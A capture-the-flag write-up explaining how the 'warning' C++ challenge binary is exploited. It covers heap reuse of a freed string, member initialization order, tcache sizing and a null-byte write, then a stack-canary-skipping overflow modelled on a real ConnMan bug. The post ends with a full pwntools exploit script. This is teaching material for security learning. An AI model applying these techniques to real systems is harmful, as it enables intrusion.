Apr 2, 2023

This challenge was partly about C++ behavior and partly about a real-life vulnerability! Here’s the description:

I use whatever compiler gives me the least warnings 🤷‍♂️. Wait, you’re saying everyone just ignores warnings anyways? Dope. Let’s fly

We are given a docker.tar.bz2 file, which can be imported with the following command:

cat docker.tar.bz2 | docker load

After loading the image and running the corresponding container, we can see the source code in static/main.cpp and the binary in challenge/warning. A quick look at the main function in the provided source shows the following:

int main(){
    // Shamelessly stolen from pedant
    int timeout = 120;
    char *timeout_str = getenv("TIMEOUT");
    if (timeout_str) {
        timeout = atoi(timeout_str);
    }
    signal(SIGALRM, timeout_func);
    alarm(timeout+2);
    signal(SIGPIPE, SIG_IGN);

    std::cout << "> " << std::flush;

    // I really hate C++
    {
        std::string s;
        std::cin >> s;
    }

    Warning* w0 = new Warning();

    if(!w0->check(1)){
        goodbye();
    }

    Warning* w1 = new Warning();

    flushcin();
    w0->get_str();

    if(!w1->check(2)){
        goodbye();
    }

    // I'll just give you the leak. Screw it
    printf("get_flag: %p\n", get_flag);

    w1->get_input();

    return 0;
}

Mostly straightforward, except for the interesting sub-scoped block:

    // I really hate C++
    {
        std::string s;
        std::cin >> s;
    }

This is where the first bug comes from. But first, what is the check function?

bool Warning::check(uint8_t lvl){
    switch(lvl){
        case 1:
            std::cout << "Case 1: " << 0x1000 << std::endl;
            if((a+b-c) == 0x1000){
                std::cout << "Nice." << std::endl;
                return true;
            }
            return false;
        case 2:
            std::cout << "Case 2: " << -256 << std::endl;
            if(a == -256){
                std::cout << "Nicee." << std::endl;
                return true;
            }
            return false;
        default:
            return false;
    }

    return false;
}

This function performs arithmetic on members of the Warning class. How is this class defined?

class Warning{
    public:
        Warning( );
        ~Warning();
        void get_str();
        void get_input();
        void jump_around(char *start, char *end, char *uncompressed, size_t uncomp_len);
        void output();
        bool check(uint8_t lvl);
    protected:
        int a;
        int b;
        int c;
        char buf[0x10C];
};
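The layout of this class matters for everything that follows, so here is a small sketch that mirrors the data members with Python's ctypes. The name WarningLayout is made up for this illustration, and the sketch assumes a 4-byte int and no vtable pointer (the class declares no virtual functions).

```python
import ctypes

class WarningLayout(ctypes.Structure):
    # Hypothetical mirror of the C++ data members, in declaration order.
    _fields_ = [
        ("a", ctypes.c_int),
        ("b", ctypes.c_int),
        ("c", ctypes.c_int),
        ("buf", ctypes.c_char * 0x10C),
    ]

size = ctypes.sizeof(WarningLayout)
print(hex(size))                       # 0x118 (280 bytes)
print(WarningLayout.a.offset,          # 0
      WarningLayout.b.offset,          # 4
      WarningLayout.c.offset,          # 8
      WarningLayout.buf.offset)        # 12
```

The three ints occupy the first 12 bytes of the object and buf starts right after them, which is the offset used in the heap arithmetic later on.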

And its constructor…

// I hate c++
Warning::Warning():
    c( 10 ),
    b( c+20 ),
    a( b-5 ){
}

# Fun with C++

When execution leaves the { ... } scope, the string object’s destructor runs and frees its heap buffer. Unfortunately for the program, if the string we supplied was large enough, that freed memory is used again when the call to Warning* w0 = new Warning(); is made. Nothing is overflowed here; instead, the object’s protected members start out holding our stale string data. This allows us to satisfy the condition if((a+b-c) == 0x1000) in Warning::check. Based on the code, it looks like Warning’s constructor will initialize c first, and then populate b and a accordingly. However, the disassembly shows that this is not the case.

Dump of assembler code for function _ZN7WarningC2Ev:
   0x0000555555556994 <+0>:     endbr64
   0x0000555555556998 <+4>:     push   rbp
   0x0000555555556999 <+5>:     mov    rbp,rsp
   0x000055555555699c <+8>:     mov    QWORD PTR [rbp-0x8],rdi
   0x00005555555569a0 <+12>:    mov    rax,QWORD PTR [rbp-0x8]
   0x00005555555569a4 <+16>:    mov    eax,DWORD PTR [rax+0x4]
   0x00005555555569a7 <+19>:    lea    edx,[rax-0x5]           ; A is first initialized with B - 0x5
   0x00005555555569aa <+22>:    mov    rax,QWORD PTR [rbp-0x8]
   0x00005555555569ae <+26>:    mov    DWORD PTR [rax],edx   
   0x00005555555569b0 <+28>:    mov    rax,QWORD PTR [rbp-0x8]
   0x00005555555569b4 <+32>:    mov    eax,DWORD PTR [rax+0x8]
   0x00005555555569b7 <+35>:    lea    edx,[rax+0x14]          ; B is then initialized with C + 0x14
   0x00005555555569ba <+38>:    mov    rax,QWORD PTR [rbp-0x8]
   0x00005555555569be <+42>:    mov    DWORD PTR [rax+0x4],edx
   0x00005555555569c1 <+45>:    mov    rax,QWORD PTR [rbp-0x8]
   0x00005555555569c5 <+49>:    mov    DWORD PTR [rax+0x8],0xa ; C is then initialized with 0xa
   0x00005555555569cc <+56>:    nop
   0x00005555555569cd <+57>:    pop    rbp
   0x00005555555569ce <+58>:    ret

# Variable initialization

So why is A being initialized first, followed by B, then C? C++ initializes non-static data members in the order they are declared in the class, not in the order they are written in the constructor’s member initializer list (GCC and Clang can report the mismatch with -Wreorder). For example, consider the following two classes. In the below example, the ordering is a,b,c.

class Warning {
    public:
        Warning( );
        ~Warning();
    private:
        int a;
        int b;
        int c;
        char buf[0x10C];
};

Which will result in the following constructor.

Dump of assembler code for function _ZN8Warning3C2Ev:
   0x000000000040131c <+0>:     push   rbp
   0x000000000040131d <+1>:     mov    rbp,rsp
   0x0000000000401320 <+4>:     mov    QWORD PTR [rbp-0x8],rdi
   0x0000000000401324 <+8>:     mov    rax,QWORD PTR [rbp-0x8]
   0x0000000000401328 <+12>:    mov    eax,DWORD PTR [rax+0x4]
   0x000000000040132b <+15>:    lea    edx,[rax-0xa]          ; A is first initialized with B - 0xa
   0x000000000040132e <+18>:    mov    rax,QWORD PTR [rbp-0x8]
   0x0000000000401332 <+22>:    mov    DWORD PTR [rax],edx
   0x0000000000401334 <+24>:    mov    rax,QWORD PTR [rbp-0x8]
   0x0000000000401338 <+28>:    mov    eax,DWORD PTR [rax+0x8]
   0x000000000040133b <+31>:    lea    edx,[rax+0x5]          ; B is then initialized with C + 0x5
   0x000000000040133e <+34>:    mov    rax,QWORD PTR [rbp-0x8]
   0x0000000000401342 <+38>:    mov    DWORD PTR [rax+0x4],edx
   0x0000000000401345 <+41>:    mov    rax,QWORD PTR [rbp-0x8]
   0x0000000000401349 <+45>:    mov    DWORD PTR [rax+0x8],0xa; C is then initialized with 0xa
   0x0000000000401350 <+52>:    nop
   0x0000000000401351 <+53>:    pop    rbp
   0x0000000000401352 <+54>:    ret

And in the below example the ordering is c,b,a.

class Warning {
    public:
        Warning( );
        ~Warning();
    private:
        int c;
        int b;
        int a;
        char buf[0x10C];
};

Produces the following constructor.

Dump of assembler code for function _ZN8Warning4C2Ev:
   0x00000000004013e0 <+0>:     push   rbp
   0x00000000004013e1 <+1>:     mov    rbp,rsp
   0x00000000004013e4 <+4>:     mov    QWORD PTR [rbp-0x8],rdi
   0x00000000004013e8 <+8>:     mov    rax,QWORD PTR [rbp-0x8]
   0x00000000004013ec <+12>:    mov    DWORD PTR [rax],0xa    ; C is first initialized with 0xa
   0x00000000004013f2 <+18>:    mov    rax,QWORD PTR [rbp-0x8]
   0x00000000004013f6 <+22>:    mov    eax,DWORD PTR [rax]
   0x00000000004013f8 <+24>:    lea    edx,[rax+0x5]          ; B is then initialized with C + 0x5
   0x00000000004013fb <+27>:    mov    rax,QWORD PTR [rbp-0x8]
   0x00000000004013ff <+31>:    mov    DWORD PTR [rax+0x4],edx
   0x0000000000401402 <+34>:    mov    rax,QWORD PTR [rbp-0x8]
   0x0000000000401406 <+38>:    mov    eax,DWORD PTR [rax+0x4]
   0x0000000000401409 <+41>:    lea    edx,[rax-0xa]          ; A is then initialized with B - 0xa
   0x000000000040140c <+44>:    mov    rax,QWORD PTR [rbp-0x8]
   0x0000000000401410 <+48>:    mov    DWORD PTR [rax+0x8],edx
   0x0000000000401413 <+51>:    nop
   0x0000000000401414 <+52>:    pop    rbp
   0x0000000000401415 <+53>:    ret

Even with identical constructors, the two classes initialize their members in exactly the opposite order! Neat.
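The effect can be modelled in a few lines of Python. This is only a sketch of the rule, not compiler output: the construct helper and the stale values are made up, and the initializers use the challenge's constants (c = 10, b = c + 20, a = b - 5) rather than the ones from the two test classes above.

```python
def construct(stale, declaration_order):
    """Run the initializers of Warning::Warning() in declaration order.

    `stale` holds whatever the memory contained before the constructor ran.
    """
    initializers = {
        "c": lambda m: 10,
        "b": lambda m: m["c"] + 20,
        "a": lambda m: m["b"] - 5,
    }
    members = dict(stale)
    for name in declaration_order:
        members[name] = initializers[name](members)
    return members

stale = {"a": 111, "b": 222, "c": 333}   # arbitrary leftover values
print(construct(stale, "abc"))  # {'a': 217, 'b': 353, 'c': 10}
print(construct(stale, "cba"))  # {'a': 25, 'b': 30, 'c': 10}
```

With the a,b,c declaration order, a and b are computed from leftover memory contents; with c,b,a the result no longer depends on them.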

If we can somehow force the allocation to land on memory we previously filled, the stale values the constructor reads will let us control the resulting a and b members of the Warning class.

# Messing with the constructor

We can clearly see what we want to target now. We can send the following data for our new Warning:: object to use.

_satisfy_w0_check = b'\x00\x08\x00\x00' + b'\xfb\x07\x00\x00' + b'\x00\x08\x00\x00' + b'A' * 0x400

But why is this extra padding needed?

# Differences between TCACHEBINS and SMALLBINS

When a chunk is freed, glibc places it in a tcache bin if its chunk size is at most 0x410 and the bin is not full. This is not what we want here, because tcache_put then overwrites the first 16 bytes of our data with the next pointer and the key. This can be seen in the malloc/malloc.c source code:

static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);

  /* Mark this chunk as "in the tcache" so the test in _int_free will
     detect a double free.  */
  e->key = tcache_key;

  e->next = PROTECT_PTR (&e->next, tcache->entries[tc_idx]);
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

Because this is not what we want, the freed allocation needs to be larger than 0x410 bytes. This is why we pad the initial _satisfy_w0_check with 0x400 bytes. This keeps the freed chunk out of the tcache, so the next call to malloc can hand the same memory back without any of our data having been overwritten.
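The size arithmetic can be sketched as follows. The two helpers mirror glibc's request2size and csize2tidx macros as I understand them, and the constants assume the x86-64 defaults; this only checks size eligibility and ignores the per-bin count limit.

```python
SIZE_SZ = 8             # sizeof(size_t) on x86-64 (assumed)
MALLOC_ALIGNMENT = 16   # assumed x86-64 default
MINSIZE = 0x20
TCACHE_MAX_BINS = 64    # glibc default

def request2size(req):
    """Chunk size malloc uses for a request of `req` bytes."""
    size = (req + SIZE_SZ + MALLOC_ALIGNMENT - 1) & ~(MALLOC_ALIGNMENT - 1)
    return max(size, MINSIZE)

def fits_tcache(chunk_size):
    """True if a freed chunk of this size maps to a tcache bin index."""
    tc_idx = (chunk_size - MINSIZE + MALLOC_ALIGNMENT - 1) // MALLOC_ALIGNMENT
    return tc_idx < TCACHE_MAX_BINS

print(hex(request2size(0x118)))                  # 0x120, the chunk size of a Warning object
print(fits_tcache(0x410), fits_tcache(0x420))    # True False
```

A 0x118-byte Warning object therefore lives in a 0x120-byte chunk, and any freed chunk of 0x420 bytes or more bypasses the tcache.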

After satisfying w0->check(), we have yet another check to pass in the second Warning object’s call to check. This time we need to satisfy a == -256. With what we know about this object’s constructor, this should be rather easy to pass.

After the 12-byte header we add 280 bytes of padding and then four \xff bytes. That places the \xff bytes at offset 0x124 of the payload: the 0x120-byte chunk size of a Warning object (the object plus heap metadata) plus the size of an int, which is exactly where w1->b ends up. The X’s are simply more padding to keep the allocation above the tcache limit. We are not overwriting w1->a directly, but w1->b, and taking advantage of the constructor to initialize w1->a to w1->b minus 5, which is -6 (0xfffffffa).

_satisfy_both_checks =  b'\x00\x08\x00\x00' + b'\xfb\x07\x00\x00' + b'\x00\x08\x00\x00' + (b'A' * 280) + b'\xff' * 4 
_satisfy_both_checks += b'X' * 0x300

After sending this data, here is what the top of the w1 object looks like.

Chunk(addr=0x556742cc1bc0, size=0x120, flags=PREV_INUSE)
    [0x0000556742cc1bc0     fa ff ff ff 6c 58 58 58 0a 00 00 00 58 58 58 58    ....lXXX....XXXX]

The w0 object at this point is:

Chunk(addr=0x556742cc1aa0, size=0x120, flags=PREV_INUSE)
    [0x0000556742cc1aa0     f6 07 00 00 14 08 00 00 0a 00 00 00 41 41 41 41    ............AAAA]
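Both dumps can be reproduced from the payload alone. The sketch below assumes, as the chunk addresses above suggest, that w1 sits 0x120 bytes after w0 inside our stale data; the construct helper is a made-up model of the constructor, not code from the challenge.

```python
import struct

payload = (b'\x00\x08\x00\x00' + b'\xfb\x07\x00\x00' + b'\x00\x08\x00\x00'
           + b'A' * 280 + b'\xff' * 4 + b'X' * 0x300)

CHUNK = 0x120  # distance between w0 and w1 in the dumps

def construct(stale12):
    """Apply a = b - 5, b = c + 20, c = 10 to 12 stale bytes (32-bit wraparound)."""
    _, b, c = struct.unpack("<3I", stale12)
    a = (b - 5) & 0xFFFFFFFF
    b = (c + 20) & 0xFFFFFFFF
    return struct.pack("<3I", a, b, 10)

w0 = construct(payload[0:12])
w1 = construct(payload[CHUNK:CHUNK + 12])
print(w0.hex(" "))  # f6 07 00 00 14 08 00 00 0a 00 00 00
print(w1.hex(" "))  # fa ff ff ff 6c 58 58 58 0a 00 00 00

a, b, c = struct.unpack("<3i", w0)
print(hex(a + b - c))  # 0x1000, so check(1) passes
```

At this point w1->a is -6 rather than -256, which is why one more write is needed.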

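Finally, we make a call to w0->get_str() and send exactly 0x114 bytes, which fills memory from the buffer at 0x0000556742cc1aac (w0 plus the 12 bytes of a, b and c) up to the last byte before w1. Doing some quick math, we can see that 0x0000556742cc1aac+0x114 is exactly the start of our w1 object, so that is where the string terminator lands. Reading the fgets man page…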

fgets() reads in at most one less than size characters from stream and stores them into the buffer pointed to by s. Reading stops after an EOF or a newline. If a newline is read, it is stored into the buffer. A terminating null byte (’\0’) is stored after the last character in the buffer.

We can write a null byte into the lowest byte of w1->a, turning 0xfffffffa into 0xffffff00, which is -256. Our final w1 object after the read will look like:

Chunk(addr=0x556742cc1bc0, size=0x4242424242424240, flags=! PREV_INUSE|IS_MMAPPED)
    [0x556742cc1bc0     00 ff ff ff 6c 58 58 58 0a 00 00 00 58 58 58 58    ....lXXX....XXXX]
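The arithmetic behind this step, using the addresses from the dumps, can be checked with a short sketch:

```python
import struct

w0 = 0x556742cc1aa0
w1 = 0x556742cc1bc0
buf = w0 + 12                  # a, b and c occupy the first 12 bytes of w0
print(hex(w1 - buf))           # 0x114 bytes from the start of buf to w1

a_before = struct.pack("<i", -1 - 5)     # b held 0xffffffff (-1), so a = b - 5
a_after = b"\x00" + a_before[1:]         # the terminator clears the lowest byte
print(a_before.hex(" "), "->", a_after.hex(" "))
print(struct.unpack("<i", a_after)[0])   # -256
```

Because x86-64 is little-endian, zeroing the first byte in memory zeroes the least significant byte of the int, which is what turns -6 into -256.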

And we pass all the checks! After that, the author was nice enough to give us an info leak for a nice little ret2win.

# Getting jumpy

Next, w1->get_input(); is called. The function is as follows:

void Warning::get_input(){
    struct {
        char buf1[1025];
        char buf2[257];
    } input_bufs = {0};

    flushcin();
    std::cout << "> ";
    if(!fgets(input_bufs.buf1, sizeof(input_bufs.buf1), stdin)){
                exit(-1);
        }
    // Do you like TBONE steak?
    jump_around(input_bufs.buf1,
                input_bufs.buf1 + 1024,
                input_bufs.buf2,
                sizeof(input_bufs.buf2));

    printf("Jump! Jump! Jump! Jump!\n");
}

Not much going on here, so on to jump_around:

// Pack it up, pack it in, let me begin
void Warning::jump_around(char *start,
                          char *end,
                          char *uncompressed,
                          size_t uncomp_len){
    // wow this whole function seems so contrived
    // it makes literally no sense
    char *uptr = uncompressed;
    char *bptr = start;
    // The bug in this function would never b a bug in real life
    while(bptr < end && uptr < (uncompressed + uncomp_len)){
        size_t ulen;
        size_t pos = 0;
        char name[63] = {0};

#if !USERINPUT
                if (!convert_label(start, end, ptr, name, NS_MAXLABEL,
                                        &pos, &comp_pos))
                        goto out;

        /*
        * Copy the uncompressed resource record, type, class and \0 to
        * tmp buffer.
        */
#else
        // Give me your con man name
        std::cout << "> ";
        fgets(name, sizeof(name), stdin);

                ulen = strnlen(name, sizeof(name));
#endif
        // Error checking, thats good
        if((uptr - uncompressed) > uncomp_len){
            return;
        }
        strncpy(uptr, name, uncomp_len - (uptr - uncompressed));
        // C++ but pointer math? :thinking_face:
        uptr += ulen;
                *uptr++ = '\0';

        bptr += pos;

        memcpy(uptr, bptr, 10);

        bptr += 10;
        uptr += 10;
    }

    return;
}

Alright, there’s a lot more going on here. The bug arises from the fact that the memcpy has no bounds check, and that uptr is advanced by ulen even when strncpy copied fewer bytes, which can push uptr out of bounds. Because of this, we can write past the end of the buffer. Usually stack canaries limit the impact of such an overflow; in this case, however, we can carefully craft our input to “jump” over the canary. Note the uptr += ulen; line that causes this.

Sending three buffers of maximum length, followed by a final buffer with a size of 0x33, lets us do this. For the final buffer, strncpy copies only uncomp_len - (uptr - uncompressed) bytes, but the full strnlen() result is still added to uptr, and this lets us “jump” over the stack cookie. Each earlier iteration consumes 10 bytes of the first input, so we send 30 padding bytes followed by our desired return address. With this, we redirect code execution wherever we want. Here is what this looks like in code.

_get = 30
p.send(b'A' * _get + p64(_offset) + b'A' * (0x400 - _get))  # PADDING before overwriting RIP
print(p.recv(timeout=1))

buf = b'\x01' *0x3d + b'\x02'                              # Fill up the buffer
buf += buf * 2
buf += b'\xaa' * (0x3d-10) + b'\x00'                       # This won't finish a full copy, but the length is important
p.sendline(buf)
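To see why 30 and 0x33 work, the loop can be modelled offline. This is a rough Python sketch of jump_around, not the challenge code: it only tracks offsets relative to buf2, the fgets helper is a simplified stand-in for the C function, the 0xcc bytes stand in for whatever lies on the stack above buf2, and the target address is a made-up placeholder for the leaked get_flag pointer.

```python
import io
import struct

UNCOMP_LEN = 257  # sizeof(input_bufs.buf2)
NAME_SIZE = 63    # sizeof(name)

def fgets(stream, size):
    """Model of C fgets: at most size - 1 bytes, stopping after a newline."""
    out = bytearray()
    while len(out) < size - 1:
        ch = stream.read(1)
        if not ch:
            break
        out += ch
        if ch == b"\n":
            break
    return bytes(out)

def jump_around(buf1, names):
    # buf2 followed by 64 marker bytes standing in for the stack above it
    mem = bytearray(UNCOMP_LEN) + bytearray(b"\xcc" * 64)
    stream = io.BytesIO(names)
    uptr = bptr = 0
    memcpy_offsets = []
    while bptr < 1024 and uptr < UNCOMP_LEN:
        name = fgets(stream, NAME_SIZE)
        ulen = (name + b"\0").index(b"\0")           # strnlen(name, sizeof(name))
        n = UNCOMP_LEN - uptr                         # strncpy length limit
        copied = name[:ulen][:n]
        mem[uptr:uptr + n] = copied.ljust(n, b"\0")   # strncpy zero-pads up to n
        uptr += ulen                                  # advances even if fewer bytes were copied
        mem[uptr] = 0
        uptr += 1
        memcpy_offsets.append(uptr)
        mem[uptr:uptr + 10] = buf1[bptr:bptr + 10]    # unchecked memcpy
        bptr += 10
        uptr += 10
    return mem, memcpy_offsets

target = 0x555555556789  # hypothetical get_flag address
buf1 = (b"A" * 30 + struct.pack("<Q", target)).ljust(1024, b"A")
names = (b"\x01" * 0x3d + b"\x02") * 3 + b"\xaa" * (0x3d - 10) + b"\x00\n"
mem, offsets = jump_around(buf1, names)
print(offsets)                                         # [63, 136, 209, 271]
print(mem[257:270] == b"\xcc" * 13)                    # True: these bytes are skipped
print(struct.unpack("<Q", mem[271:279])[0] == target)  # True
```

In this model the fourth memcpy lands at offset 271, past the 257-byte buf2, while the 13 bytes directly after buf2 are never written. Whether offset 271 lines up with the saved return address depends on the binary's stack layout, which is taken from the payload above rather than derived here.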

# Putting it all together

With all that in mind, here is what the final exploit looks like.

from pwn import *
from binascii import hexlify, unhexlify

context.terminal = ['tmux', 'splitw', '-h']

_ticket = "TICKET"

g = cyclic_gen()
_remote = 0
if _remote:
    p = remote("warning.quals2023-kah5Aiv9.satellitesabove.me",5300)
    p.sendline(_ticket.encode())
else:
    p = process("./warning")

print(p.recvuntil(b'> '))

p.sendline(b'\x00\x08\x00\x00' + b'\xfb\x07\x00\x00' + b'\x00\x08\x00\x00' + b'A' * (280) + b'\xff\xff\xff\xff' +b'X' * 0x300)

print(p.recvline())
print(p.recvline())
print(p.recvuntil(b'> '))

print("sending first payload")

p.sendline(b"B"*0x114)

p.recvline()
p.recvline()

leak = p.recvline()
print(leak)
_offset = int(leak.split(b' ')[1][:-1],16)

print("Got leaked function: " + hex(_offset))

_get = 30
p.send(b'A' * _get + p64(_offset) + b'A' * (0x400 - _get))
print(p.recv(timeout=1))

buf = b'\x01' *0x3d + b'\x02'
buf += buf * 2
buf += b'\xaa' * (0x3d-10) + b'\x00'
p.sendline(buf)

print(p.recvuntil(b'> '))

print(p.recvline())
print(p.recvline())

Run it, and get the flag.

# Misc

The jump_around function is based on an actual vulnerable function in the ConnMan (v1.37) network manager, which was used by the Tesla Model 3. The bug was leveraged by the team at Comsecuris to exploit the Model 3 at the 2020 Pwn2Own competition! Super cool stuff.

The version of glibc used in this challenge is 2.35.